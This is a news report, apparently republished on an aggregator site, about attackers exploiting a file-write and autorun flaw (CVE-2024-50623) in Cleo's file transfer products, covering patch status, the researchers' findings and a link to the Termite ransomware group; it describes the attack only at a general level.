Daily Flux Report

Hackers Exploiting Cleo Software Zero-Day


Hackers Exploiting Cleo Software Zero-Day

Attackers Target Managed File Transfer Software Vulnerabilities

Update Dec. 12, 2024, 00:34 UTC: A Cleo spokesperson said the company has released a new patch to address active hacking of its file transfer software. "Cleo strongly recommends customers apply the available patch immediately."

See Also: How to Empower IT with Immutable Data Vaults

File transfer software made by Cleo Communications is under active attack and a patch meant to stymie hackers doesn't fix the flaw, say security researchers from Huntress.

Hackers are exploiting an arbitrary file-write vulnerability tracked as CVE-2024-50623 along with a feature in Cleo software that automatically executes files in the autorun directory.

Huntress said it first identified on Dec. 3 a vulnerability affecting Cleo's LexiCom, VLTransfer and Harmony software products. The privately held, Illinois based, file transfer company on Monday published a patch - but the fix "does not mitigate the software flaw," Huntress wrote the same day.

Cybersecurity researchers say Cleo employees vowed during a Zoom call to develop a second patch. Cleo on Wednesday afternoon said it has identified an unauthenticated malicious hosts vulnerability that could lead to remote code execution, with a CVE identifier "pending."

In an emailed statement, a Cleo spokesperson said the company promptly "launched an investigation with the assistance of outside cybersecurity experts, notified customers of this issue and provided mitigation steps customers should immediately take to address the vulnerability while a patch is under development. Our investigation is ongoing."

Huntress advised Cleo customers to delete contents from the autorun directory, disabling attack paths through that function. "This will not prevent the arbitrary file-write vulnerability until a patch is released," Huntress warned.

Cleo file transfer software are used in industries with large-scale logistics and supply chain operations. Huntress wrote that it spotted "at least 10 businesses" with compromised Cleo servers, with a "notable uptick in exploitation observed on Dec. 8 around 07:00 UTC." The majority of customers with a Cleo hacking problem deal with consumer products, the food industry, trucking and shipping sectors. A search on Shodan showed 436 vulnerable servers, the vast majority of them located inside the United States.

The attack chain begins with hackers planting malicious files in the autorun directory triggering automatic execution. The files enable attackers to invoke PowerShell commands, gaining persistent access through webshells retrieved from external servers. Uploaded malicious autorun files have included the files and .

Cybersecurity researcher Kevin Beaumont posted that among the cybercriminal groups exploiting the Cleo vulnerability is the Termite ransomware operation. Apparently active since April, Termite uses a modified version of leaked Babuk cryptolocker malware. It boosted its profile by claiming responsibility in late November for an attack against chain management software provider Blue Yonder that has disrupted operations at Starbucks and major British supermarket chains (see: Ransomware Attack on Supply Chain Provider Causes Disruption).

Previous articleNext article

POPULAR CATEGORY

corporate

4511

tech

4974

entertainment

5505

research

2499

misc

5709

wellness

4361

athletics

5830